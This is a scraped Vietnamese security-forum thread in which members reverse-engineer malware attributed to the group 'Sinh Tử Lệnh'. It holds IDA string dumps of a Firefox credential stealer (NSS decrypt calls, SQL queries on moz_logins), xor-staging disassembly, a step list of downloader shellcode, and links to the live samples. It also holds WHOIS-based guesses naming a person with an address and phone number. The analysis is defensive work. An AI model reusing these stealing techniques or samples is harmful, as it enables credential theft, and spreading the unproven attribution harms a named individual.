Từ tháng 4 năm 2008 đến 2010, smartshow.info được georgiy-fedo@yandex.ru đăng ký và sử dụng. Từ 23 tháng 4 năm 2010, được một (người Hoa =)) ) có tên là Zhong Guo Jun đăng ký sử dụng. Search "Zhong Guo Jun" ra khối thứ lý thú ;). Với domain status: PENDING DELETE RESTORABLE thường là domain không renew cho nên bị "delete". Tuy nhiên, chuyện lý thú là domain smartshow.info này được update lần cuối là ngày 2 tháng 6 2011 và domain còn hiệu lực (đã trả tiền) đến 22 tháng 4 năm 2012 lận. Vậy "Status: PENDING DELETE RESTORABLE" là điều bí ẩn :). 
Tổng hợp thông tin về Zhong Guo Jun như sau: Làm việc tại VNVN System Inc ( có thể là người sáng lập ) Địa chỉ: 14902 Moran Street Westminster, CA 92683 US Phone: 714-726-9966 Đây là 1 công ty chuyên về thiết kế web cho cộng đồng người Việt tại US Website chính là vnvn.net Các website liên quan: trungtam.com, vietherald.com, vnvn.net, vncyber.com ( cái này không biết có liên quan đến cái project cybergame trong phân tích của TQN không ) @anh conmale: Trong trường hợp của domain smartshow.info, domain status đầy đủ thì có mấy trường hợp sau : CLIENT HOLD, CLIENT TRANSFER PROHIBITED, HOLD, PENDING DELETE RESTORABLE nên chưa chắc nó đã là PENDING DELETE RESTORABLE 
Hì hì, Thử tìm hiểu các domain names ở trên nằm ở đâu và tại sao vietherald.com lại nằm bên tận onlinenic.com của CN? Địa chỉ của vnvn.net thì ở Westminter, CA nhưng tại sao địa chỉ của "Zhong Guo Jun" lại ở Kirkland tận tiểu bang WA? ;). Đó là chưa kể những chi tiết nằm trong địa chỉ và số điện thoại ;).]]>
/hvaonline/posts/list/38818.html#241930 /hvaonline/posts/list/38818.html#241930 GMT
RCE đám virus của Sinh Tử Lệnh.

conmale wrote:
Địa chỉ của vnvn.net thì ở Westminter, CA nhưng tại sao địa chỉ của "Zhong Guo Jun" lại ở Kirkland tận tiểu bang WA? ;). Đó là chưa kể những chi tiết nằm trong địa chỉ và số điện thoại ;). 
Việc người có địa chỉ ở tiểu bang A sang tiểu bang B sống và làm việc là chuyện bình thường ở US nên việc này cũng không là vấn đề. Vấn đề theo em nghĩ địa chỉ ở WA là giả, em có sử dụng gmap với usps mà không tim ra địa chỉ cá nhân đó. Việc bịa ra info khi đăng ký domain là điều rất đơn giản, registrar chỉ quan tâm cái credit card của khách hàng pay đều là được Em có đăng ký hosting và domain tại GoDaddy mà chẳng thấy nó gửi cái billing nào về nhà cả. ]]>
/hvaonline/posts/list/38818.html#241932 /hvaonline/posts/list/38818.html#241932 GMT
RCE đám virus của Sinh Tử Lệnh.
Decode xong mới phát hiện STL còn dùng một keylog dll khác, xem trong hình các bạn sẽ thấy: CDRWapi.dll. Nếu ipripv6.dll detect có hardkdb.dll trong Windows\ime directory thì load nó, còn không thì load %AppData%\Microsoft\Windows Media\CDRWapi.dll. File này máy em không có, bà con ai có share em với. Hay là STL chưa release ? Thôi, mấy anh STL có nó thì gởi vào hộp mail Google hay Yahoo của em một bản với ;)]]>
/hvaonline/posts/list/38818.html#242063 /hvaonline/posts/list/38818.html#242063 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Tối qua nhậu quắc cần câu, giờ mệt quá, ở nhà, mở ipripv6.idb với IDA 61, switch debugger qua Local Bochs debugger, PE mode, decode một loạt các string của nó. Quá đã, chỉ cần Set IP ở các địa chỉ call hàm Decode, trace mấy phát, lòi ra hết. Bochs chạy êm ru, không trục trặc gì cả.
Decode xong mới phát hiện STL còn dùng một keylog dll khác, xem trong hình các bạn sẽ thấy: CDRWapi.dll. Nếu ipripv6.dll detect có hardkdb.dll trong Windows\ime directory thì load nó, còn không thì load %AppData%\Microsoft\Windows Media\CDRWapi.dll. File này máy em không có, bà con ai có share em với. Hay là STL chưa release ? Thôi, mấy anh STL có nó thì gởi vào hộp mail Google hay Yahoo của em một bản với ;) 
1- TQN kiểm tra kỹ lại xem khi decode LoadWbmainDLL+2C9 thì nó ra một service nằm trong system32 là "svchost.exe" (System32/svchost.exe) hay là svchost.exe -k netsves Vì svchost.exe là một service gốc trong Windows, nó chuyên dùng cho một số dịch vụ quan trong của chính Windows Xin tham khảo lại bài viết liên quan của mình tại trang 2 của chính topic này:
Theo tôi, nếu gặp những khó khăn như trên, có thể nghĩ đến một cách tiếp cận khác. (sau đó có thể quay lai cách tiếp cận cũ) Các file .dll (hardkbd.dll- keylogger và wbmain.dll-downloader) mà chúng ta đang disassembling có những mối liên hệ với một service quan trong mà Trojan thiết lập mới trong hệ thống, có nhiệm vụ tạo socket kết nối Internet với máy chủ -website của hacker, để chuyển thông tin lấy cắp và nhận lệnh (thí dụ website smartshow.info) Service này, trong các malicious tool (ware) của STL hay của các Chinese hacker khác thường là "iprip", tiến trình của nó là svchost.exe -k netsves (chú ý phân biệt với svchost.exe gốc của Windows-local service) Vì bận quá, nên tôi chưa có thời gian phân tích kỹ 2 file dll nói trên và cho chay file virus.doc trên máy thật. Vả lại có phân tích thì cũng không bằng TQN được. Tuy nhiên đã socket spying sơ qua file tiến trình svchost.exe -k netsves nói trên 
2- Ngoài ở đây "Set IP" thì IP là IP gì theo ý TQN? ]]>
/hvaonline/posts/list/38818.html#242065 /hvaonline/posts/list/38818.html#242065 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242066 /hvaonline/posts/list/38818.html#242066 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Không có gì đâu anh, svchost.exe là Service Host Control Process. Nó quản lý việc khởi tạo, run, stop... tất cả các service trong Windows. ipripv6.dll đăng ký nó như một service DLL, run trong process memory space của svchost.exe Service Name: Iprip Service cmdline: %SystemRoot%\System32\svchost.exe -k netsvcs ServiceDLL: path của chính nó, ipripv6.dll ......................  
OK! Thanks TQN và các bạn tham khảo bản phân tích này. Tôi ghi chú các bình luận của mình từ 31-5-2011, định post lên để các bạn tham khảo thêm cho vui, nhưng vì bận thảo luận cái việc Hacker VN vs Hacker Tầu từ ngày 1-6-2011 cho đến nay nên quên khuấy. Nay xin post lại



]]>
/hvaonline/posts/list/38818.html#242068 /hvaonline/posts/list/38818.html#242068 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242105 /hvaonline/posts/list/38818.html#242105 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242116 /hvaonline/posts/list/38818.html#242116 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242126 /hvaonline/posts/list/38818.html#242126 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242146 /hvaonline/posts/list/38818.html#242146 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242256 /hvaonline/posts/list/38818.html#242256 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242267 /hvaonline/posts/list/38818.html#242267 GMT RCE đám virus của Sinh Tử Lệnh. Code:
.rdata:10004100 Software
.rdata:10004118 \r\n\r\n========================= Application List ==========================\r\n
.rdata:100041B0 \r\n
.rdata:100041B8 SELECT DISTINCT moz_places.url, moz_bookmarks.title FROM moz_places LEFT JOIN moz_bookmarks WHERE (moz_bookmarks.fk == moz_places.id) AND (moz_bookmarks.title  IS NOT NULL);
.rdata:10004270 ========================= Firefox Favorite ==========================\r\n
.rdata:10004300 \t\t
.rdata:10004308 SELECT hostname FROM moz_logins
.rdata:10004328 SELECT encryptedUsername FROM moz_logins
.rdata:10004354 SELECT encryptedPassword FROM moz_logins
.rdata:10004380 %s
.rdata:10004388 ========================= Firefox Username ==========================\r\n
.rdata:10004418 SELECT moz_places.url,moz_places.title FROM moz_historyvisits LEFT JOIN moz_places ON moz_historyvisits.place_id=moz_places.id ORDER BY moz_historyvisits.visit_date DESC LIMIT 500
.rdata:100044D0 ========================= Firefox Last Visited ==========================\r\n
.rdata:10004568 NSS_Init
.rdata:10004574 NSSBase64_DecodeBuffer
.rdata:1000458C PK11_GetInternalKeySlot
.rdata:100045A4 PK11_Authenticate
.rdata:100045B8 PK11SDR_Decrypt
.rdata:100045C8 NSS_Shutdown
.rdata:100045D8 PK11_FreeSlot
.rdata:100045E8 sqlite3_initialize
.rdata:100045FC sqlite3_open
.rdata:1000460C sqlite3_prepare_v2
.rdata:10004620 sqlite3_step
.rdata:10004630 sqlite3_column_text
.rdata:10004644 sqlite3_finalize
.rdata:10004658 sqlite3_close
.rdata:10004668 \\Mozilla\\Firefox\\profiles.ini
.rdata:100046A4 Path
.rdata:100046B0 Profile0
.rdata:100046C8 %s\\Mozilla\\Firefox\\%s\\compatibility.ini
.rdata:10004718 LastPlatformDir
.rdata:10004738 Compatibility
.rdata:10004754 LastAppDir
.rdata:1000476C mozcrt19.dll
.rdata:10004788 sqlite3.dll
.rdata:100047A0 %s\\%s
.rdata:100047AC nspr4.dll
.rdata:100047C0 plc4.dll
.rdata:100047D4 plds4.dll
.rdata:100047E8 softokn3.dll
.rdata:10004804 nss3.dll
.rdata:10004818 %s\\Mozilla\\Firefox\\%s\\places.sqlite
.rdata:10004860 %s\\Mozilla\\Firefox\\%s\\signons.sqlite
.rdata:100048B0 Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache
.rdata:10004928 ========================= Recent Application List ==========================\r\n
.rdata:10004A18 \r\n\r\n========================= Yahoo Profile List ==========================\r\n
.rdata:10004AB8 Software\\Microsoft\\Internet Explorer\\TypedURLs
.rdata:10004B18 ========================= Internet Explorer History ==========================\r\n
.rdata:10004BBC url%i
.rdata:10004BC8 SeDebugPrivilege
.rdata:10004BEC explorer.exe
.rdata:10004C08 *.doc*
.rdata:10004C18 *.xls*
.rdata:10004C28 *.ppt*
.rdata:10004C38 *.txt
.rdata:10004C44 *.php*
.rdata:10004C54 *.asp*
.rdata:10004C64 *.au
.rdata:10004C70 ========================= File List ==========================\r\n
.rdata:10004CF4 %s
.rdata:10004CFC Windows
.rdata:10004D0C Program Files
.rdata:10004D28 $Recycle.Bin
.rdata:10004D44 ProgramData
.rdata:10004D5C Config.Msi
.rdata:10004D74 System Volume Information
.rdata:10004DA8 Recovery
.rdata:10004DBC MSOCache
.rdata:10004DD0 PerfLogs
.rdata:10004DE4 AppData
.rdata:10004DF4 All Users
.rdata:10004E08 Program Files (x86)
.rdata:10004E30 RECYCLER
.rdata:10004E44 %s\\*
Coder STL dùng chính các Dll của Firefox và sqlite3.dll để decode các username, password mà Firefox lưu lại. Chúng tìm file profiles.ini rồi suy ra file compatibility.ini. Đọc file compatibility.ini để lấy Firefox install path, load một loạt các dll trên, GetProcAddress một loạt các function để decode rồi issus sql command cho sqlite3.dll, parse result trả về. Source của decrypt Firefox password có đầy trên mạng, vd các bạn có thể Google với "NSSBase64_DecodeBuffer" sẽ ra một loạt kết quả. Trong danh sách các file extension mà tuị này lấy, em không biết file .au là của cái gì, sao giống AutoIt quá vậy ? Bà con nào biết chỉ em với ! Vì file StaticCache.dat (CollectInfo.dll) này nhỏ, chỉ có vỏn vẹn 29 hàm, nhưng việc viết lại hoàn chỉnh C code của nó rất mất thời gian, nên em chỉ up lên mediafire file IDA61 idb, file StaticCache.dat và pesudo-C code mà HexRays tạo ra. Bà con nào biết lập trình C for Win có thể đọc file .c và hiểu được: http://www.mediafire.com/?ama8ftvsdo702w1 Tới gần đây, em vẫn tự hỏi: Quái, làm sao nó lấy được 1 loạt password như vậy được, mình có bao giờ gõ pwds vào đâu, Firefox tự làm hết mà. Không lý tụi này run được Firepassviewer trên máy em à. Tới chiều này, ngồi decode dao360.mui, mới lòi ra thêm một đống "meo què" của tụi STL này. À, sẵn tiện nhắc lại, toàn bộ "mèo què s" của STL em up ở đây: http://www.mediafire.com/?tz745o0f678w8 Và các bạn có để ý là tới bây giờ, tổng số file malware ("meo què") của STL cài vào mấy victim đã là 12 file .dll, .mui, .ocx rồi. Một coder không thể code một đống meo què như vậy được. Chúng toàn xài VC++ 2008, 2010 không, build ở mode UNICODE hết.]]>
/hvaonline/posts/list/38818.html#242322 /hvaonline/posts/list/38818.html#242322 GMT
RCE đám virus của Sinh Tử Lệnh. http://www.mediafire.com/?goj6zd0z3c1b2of Các bạn so sánh với code C trong file StaticCache.c sẽ thấy nó giống ở chức năng và cách dùng hàm, cách gọi hàm APIs của Firefox, chỉ thiếu phần execute SQLite3 cmds để lấy bookmarks...]]> /hvaonline/posts/list/38818.html#242325 /hvaonline/posts/list/38818.html#242325 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Trong danh sách các file extension mà tuị này lấy, em không biết file .au là của cái gì, sao giống AutoIt quá vậy ? Bà con nào biết chỉ em với !  
Primary association: uLaw/AU Audio File File classification: Audio Mime type: audio/basic, audio/x-basic, audio/au, audio/x-au, audio/x-pn-au, audio/rmf, audio/x-rmf, audio/x-ulaw, audio/vnd.qcelp, audio/x-gsm, audio/snd Identifying characters Hex: 2E 73 6E 64 00 00 00 , ASCII: .snd Related links: IrfanView, AudioPlayer, FILExt CODEC and Video Player FAQ Other applications associated with file type AU: Audacity (Audio Block)Audacity is free, open source software for recording and editing sounds. It is available for Mac OS X, Microsoft Windows, GNU/Linux, and other operating systems. This association is classified as Audio. The identifying characters used for this association are - Hex: 64 6E 73 2E , ASCII: dns Theo mình .AU3 hình như mới là định dạng của AutoIt]]>
/hvaonline/posts/list/38818.html#242335 /hvaonline/posts/list/38818.html#242335 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242353 /hvaonline/posts/list/38818.html#242353 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242355 /hvaonline/posts/list/38818.html#242355 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242360 /hvaonline/posts/list/38818.html#242360 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242452 /hvaonline/posts/list/38818.html#242452 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242501 /hvaonline/posts/list/38818.html#242501 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Có một người tui không biết vừa gởi cho tui 1 số file mới mà theo người đó là virus mới của STL. Điều này tui không chắc. Nhưng phân tích sơ bộ thì các file này được viết = VB.NET, protect = Smart Assembly và DotNet Reactor v4.x. Sau khi unpack chúng ra xong, thì thấy ngay đám malwares mới này cũng dùng các API và SQLite3 y như StaticCache.dat. Mục đích là ăn cắp user name và passwords của victim từ Google Chrome, FireFox, IE, GoogleTalk... và sưu tầm một loạt thông tin về máy của victim và dùng mail và FTP để gởi đi. Bộ mấy con này của mấy anh STL à, sao mấy anh không viết = VC++ nữa mà chuyển dang dùng VB.NET. Vậy thì mấy anh càng chết nữa, càng dể lộ thông tin về mấy anh rồi. Rongchaua ơi, vào đây giúp anh nè, có việc đúng chuyên môn về RE .NET của em đấy. Bây giờ em phải đi gấp rồi, tối về em unpacked và deobfuscation xong rồi em up lên.  
Không khéo lão thành tester miễn phí cho các bạn STL đấy TQN à. Biết đâu các bạn này học được chút thâm bẩn của mấy bạn tàu rồi chăng ? B-) ]]>
/hvaonline/posts/list/38818.html#242567 /hvaonline/posts/list/38818.html#242567 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#242605 /hvaonline/posts/list/38818.html#242605 GMT RCE đám virus của Sinh Tử Lệnh.

maithangbs wrote:
Bác TQN bình tĩnh, bác không nghĩ là bọn Tung của có biết tiếng Việt à? Hoặc Có thằng nào ghét bác à? 
Hì hì, quả thực bọn tung của biết tiếng Việt mà chơi trò STL thì không có gì để nói. Chỉ có điều đám này là người Việt nhưng thích làm tung của và toàn lấy tên tung của và chơi trò STL mới là chuyện đáng nói.]]>
/hvaonline/posts/list/38818.html#242712 /hvaonline/posts/list/38818.html#242712 GMT
RCE đám virus của Sinh Tử Lệnh. Code:
.code:10005174                 push    "%CSIDL_APPDATA%"   ; csidl
.code:10005176                 lea     ecx, [esp+630h+FileName] ; Load Effective Address
.code:1000517D                 push    ecx             ; pszPath
.code:1000517E                 push    ebx             ; hwnd
.code:1000517F                 mov     [esp+638h+NumberOfBytesWritten], ebx
.code:10005183                 call    ds:SHGetSpecialFolderPathW ; Indirect Call Near Procedure
.code:10005183
.code:10005189                 test    eax, eax        ; Logical Compare
.code:1000518B                 jnz     short loc_100051A5 ; Jump if Not Zero (ZF=0)
.code:1000518B
.code:1000518D                 pop     ebx
.code:1000518E                 mov     ecx, [esp+624h+var_4]
.code:10005195                 xor     ecx, esp        ; Logical Exclusive OR
.code:10005197                 call    check_esp       ; Call Procedure
.code:10005197
.code:1000519C                 add     esp, 624h       ; Add
.code:100051A2                 retn    8               ; Return Near from Procedure
.code:100051A2
.code:100051A5 ; ---------------------------------------------------------------------------
.code:100051A5
.code:100051A5 loc_100051A5:                           ; CODE XREF: sub_10005120+6Bj
.code:100051A5                 push    ebp
.code:100051A6                 push    edi
.code:100051A7                 lea     edx, [esp+630h+pMore] ; Load Effective Address
.code:100051AB                 push    edx
.code:100051AC                 mov     eax, offset sz2F0D4D010D1E1A0E207C300A1B0406060F110D2632 ; "2F0D4D010D1E1A0E207C300A1B0406060F110D2"...
.code:100051B1                 call    decryptString   ; \Identities\Thumbs.db
File thumbs.db này chứa dữ liệu thu thập, mã hoá bằng xor. Code:
.code:1000527A                 mov     edi, [esp+630h+arg_0]
.code:10005281                 push    4               ; flProtect
.code:10005283                 push    1000h           ; flAllocationType
.code:10005288                 inc     edi             ; Increment by 1
.code:10005289                 push    edi             ; dwSize
.code:1000528A                 push    0               ; lpAddress
.code:1000528C                 call    ds:VirtualAlloc ; Reserves or commits a region of pages in the virtual address space of the calling process.
.code:1000528C                                         ; Memory allocated by this function is automatically initialized to zero, unless MEM_RESET is specified.
.code:1000528C
.code:10005292                 mov     ebx, eax
.code:10005294                 push    ebx
.code:10005295                 mov     ecx, esi
.code:10005297                 call    private_encrypt_xor ; Call Procedure
các string decode được từ dao360.dll

file IDA6.1 em đang phân tích ở đây http://www.mediafire.com/?3m3asb44lgfy3uk Nhìn trong mớ string decode được thì còn vài file dll nữa chưa có trong chỗ anh TQN up lên, reverse đủ bộ chắc oải quá.]]>
/hvaonline/posts/list/38818.html#243141 /hvaonline/posts/list/38818.html#243141 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#243161 /hvaonline/posts/list/38818.html#243161 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#243231 /hvaonline/posts/list/38818.html#243231 GMT RCE đám virus của Sinh Tử Lệnh. Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức.]]> /hvaonline/posts/list/38818.html#243243 /hvaonline/posts/list/38818.html#243243 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức. 
Không lẽ lủ virus đó được ra lệnh để huỷ data trên HDD ?.]]>
/hvaonline/posts/list/38818.html#243261 /hvaonline/posts/list/38818.html#243261 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#246362 /hvaonline/posts/list/38818.html#246362 GMT RCE đám virus của Sinh Tử Lệnh.

chiro8x wrote:

TQN wrote:
Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức. 
Không lẽ lủ virus đó được ra lệnh để huỷ data trên HDD ?. 
Hôm nay mới thấy cái ý kiến khá nhảm này. Bồ chỉ sợ bị huỷ data trên HDD thôi sao? Vậy nếu data không bị huỷ mà bị đánh cắp hay chính máy của bồ được dùng làm zombie để phá hoại người khác thì không sao?]]>
/hvaonline/posts/list/38818.html#246364 /hvaonline/posts/list/38818.html#246364 GMT
RCE đám virus của Sinh Tử Lệnh.

conmale wrote:

chiro8x wrote:

TQN wrote:
Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức. 
Không lẽ lủ virus đó được ra lệnh để huỷ data trên HDD ?. 
Hôm nay mới thấy cái ý kiến khá nhảm này. Bồ chỉ sợ bị huỷ data trên HDD thôi sao? Vậy nếu data không bị huỷ mà bị đánh cắp hay chính máy của bồ được dùng làm zombie để phá hoại người khác thì không sao? 
Em đâu có làm gì đâu mà sợ anh, chỉ toàn tài liệu. @Hôm nay mới đọc kĩ hết lại, nhìn mấy đoạn code disasm thấy nãn quá, đã bỏ công viết virus rồi cũng không làm luôn mấy cái hàm decrypt string cho ra hồn. Coding chắp vá xem cũng hại não. Mà SLT dạo này chìm nhỉ chẳng thấy nữa !. Mấy idol này lặn nhanh quá, chắc mấy anh đang đợi một lần xuất hiện chói loá, với những kiến thức vừa được dạy.]]>
/hvaonline/posts/list/38818.html#254698 /hvaonline/posts/list/38818.html#254698 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#254703 /hvaonline/posts/list/38818.html#254703 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Nó ngủ rồi thì để nó ngủ đi em, đánh thức nó dậy làm chi, khổ lắm. 
Em có đọc qua một số các source virus của nhóm coderz củ, tài liệu của nhóm này từ năm 1999-2003 nhưng phần lớn virus của họ được decrypt rất hay và sử dụng nhiều biện pháp mã hoá đơn giản và rất hiệu quả. Việc tính toán địa chỉ của các API rất ngắn gọn và thông minh, ngoài ra mấy cái code không kèm theo debug info như của mấy anh SLT idol này, nói thật thì mấy anh này làm em chẳng thấy có thiện cảm lắm, em chỉ muốn nói về mặt kỹ thuật thôi. Coding virus như mấy anh thì nãn thật. Mà thấy SLT viết virus bằng Visual Studio :| không lẽ đây là mốt mới. Em thấy có phần đầu là hay thôi còn về sau thì thấy cũng đỡ hay (em không có ý nói anh TQN nhé). Bài viết của anh TQN rất dễ hiểu mặc dù em chỉ học qua TASM32 chứ không có kiến thức về RE. Lúc nào em thử coding 1 em rồi nhờ anh TQN chỉ giáo thêm mới được. Nhưng chắc là lâu :D, em đang đợi xem mấy idol của em toả sáng =)).]]>
/hvaonline/posts/list/38818.html#254727 /hvaonline/posts/list/38818.html#254727 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Tiếp tục nào anh em, ta sẽ đi tiếp với wbmain.dll. File này nguyên bản được pack = PE Compact. Em đã manual unpack nó ra, dể dàng, do tụi STL này không biết cách dùng các plugin của PE Compact. File đã unpack là file em đã up lên mediafire. Em chỉ nhớ hồi mấy tháng trước em cách ly nó từ thư mục <Windows\Sytem32\Wbem". Bà con vào thử thư mục này, thấy có file wbmain.dll này không. Tụi này nhét malware của nó tuốt trong đó. Còn cơ chế load của nó thì em sorry, lúc em cách ly, em quên ghi lại nó được load như thế nào. Bà con thông cảm cho em nhé. Thằng wbmain.dll này là một trong những thằng chính, làm nhiệm vụ download các đống malware khác về. À, tư dưng em nghĩ: không lý VN ta có những thằng giấu mặt viết malware khá vậy à. Ai là sư phụ của STL vậy, mấy đại ca ? Cho em đi theo học sư phụ đó với, bỏ nghề buôn bán VLXD luôn (tụi mày nói trật lất về cái nghề chính của tao rồi); File này lại do thằng khác trong đám STL viết, thằng này lại viết theo kiểu thuần C++ hơn thằng viết hardkbd.dll. Nó không chơi khai báo local buffer bự tổ chảng mà lại dùng operator new để alloc memory. Thằng viết hardkbd.dll thì dùng đồ mới, VS 2010, Linker version = 10.0, build vào ngày 03/05/2010, 08:43. Còn thằng viết wbmain.dll thì dùng VS 2008, linker verison = 9.0, build vào ngày 06/08/2010, 04:03. MS Rich data hiển thị thông tin về compiler, linker, lib version của VS mà 2 thằng coder của STL dùng như sau: Đây là MS Rich data của hardkbd.dll:
Đây là MS Rich data của wbmain.dll:
Thằng code hardkbd.dll lại hớ hênh, build với debug info, không xoá debug info nên thư mục source code của nó còn nằm chình ình trong file dll:
Bà con gấu gồ với key: CyberGame thì sẽ tìm ra điều thú vị. Không lẽ có dính đến học viên của Aptech à ???? Qua debug info của hardkbd.dll, ta có thể kết luận, thằng coder STL này create project với name là ieframe.dll, sau đó nó mới đổi tên ieframe.dll thành hardkdb.dll và ieframe.ocx. Vậy chắc có lẽ ieframe.ocx không cần nữa, nhưng nếu ai đó up cho tui thì tốt. Trong wbmain.dll, STL coder này dùng một số hàm API WinHttp rất ít dùng, ít phổ biến (thậm chí em khi còn là coder cũng không biết tới, chỉ biết WinInet API, sau này search tới search lui mới biết). Các hàm WinHttp này nằm trong Winhttp.dll, khi build include Winhttp.h và link với Winhttp.lib:
Và HTTP header của nó:
Google với key WinHttpOpen, chỉ những trang tiếng Việt, nó cho ta topic (theo tui là chính xác nhất, cả Gecko gì đó luôn): http://forums.congdongcviet.com/showthread.php?p=202006#post202006 Không biết lequochoang2 này là ai, và sorry Kevin Hoàng nhé, em có dính dáng gì không ? À mà quên, cái Gecko string này chỉ là 1 trong 1 đống Gecko string của tụi nó, từ từ em post sau. Thằng coder wbmain.dll này dùng tá lã hết, copy code hả em, khi thì dùng socket API, khi thì dùng WinHttp API. Em chả hiểu nổi nữa. Bà con đừng giận em câu giờ, câu bài nhé, thích thì em mới làm thôi. Cái của nợ dll, exe này em có từ năm ngoái lân, nhưng chưa bao giờ RCE xong xuôi, ra đầu ra đũa cả. Bây giờ mới móc ra mà làm, post lên ! Sao có mình em độc diễn vầy nè, buồn quá ! Bà con reversers khác vào tham gia cho vui chứ ! 
Lạ thật, một ảnh anh TQN gửi ở trên đã bị xóa rồi: http://img830.imageshack.us/img830/7923/hardkbddbginfo.gif Chắc ban quản trị forum phải tiếp tục backup các ảnh anh TQN đã gửi lên rồi. Theo mình biết thì hiện tại vẫn có nơi ở Việt Nam đang tiếp tục tuyển các lập trình viên đang hoặc đã từng viết malware, trojan, virus,... Nhu cầu này bức thiết đến nỗi cho phép làm việc từ xa nữa :( . Bài sau cũ rồi, tình cờ đọc được: Tác giả virus VLove là sinh viên FPT Aptech http://fpt.aptech.edu.vn/chitiet.php?id=616]]>
/hvaonline/posts/list/38818.html#261069 /hvaonline/posts/list/38818.html#261069 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Bây giờ em cũng mệt rồi, nên em chỉ nói ngắn gọn các công đoạn của shellcode: 1. Tạo URL string. 2. Tạo API name bằng cách mov từng DWORD API name vào buffer. 3. Lấy PEB address, duyệt module link list để lấy kernel32.dll base address 4. Scan export table của kernel32.dll để lấy address của GetProcAddress 5. Download file image.jpg về %Temp%\randomname 6. Nếu download thành công, call CreateProcess với param là file jpg đó. File đó thực chất là file exe, mở đường cho download một loạt malware khác của mấy "ông nội" STL về máy victim (lại victim nữa, nhắc lại niềm đau của em). 7. Nếu download không thành công, TerminateProcess luôn (WinWord đi luôn).  
nếu như thế thì cần phải xác định được hệ điều hành của victim à ->với asrl+dep thì đi ăn cám]]>
/hvaonline/posts/list/38818.html#265188 /hvaonline/posts/list/38818.html#265188 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#265189 /hvaonline/posts/list/38818.html#265189 GMT